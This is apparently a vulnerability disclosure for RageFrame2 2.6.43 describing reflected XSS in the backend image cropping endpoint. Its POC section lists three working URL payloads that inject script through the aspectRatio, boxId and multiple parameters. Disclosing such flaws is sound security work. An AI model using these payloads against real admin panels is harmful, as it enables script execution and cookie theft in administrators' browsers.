Description
Summary
RageFrame2 2.6.43 has a reflective cross-site scripting (XSS) vulnerability. An attacker can execute malicious code in the admin's browser by inducing the admin to click on a link containing malicious code.
Details
In the image cropping function of RageFrame2 2.6.43, aspectRatio, boxId and multiple variables are not filtered, resulting in multiple reflective XSS vulnerabilities.
POC
aspectRatio XSS payload
http://your-ip/backend/cropper/crop?aspectRatio=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&boxId=1&multiple=0

boxId XSS payload
http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&multiple=0

multiple XSS payload
http://192.168.160.154:4488/backend/cropper/crop?aspectRatio=1&boxId=1&multiple=%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
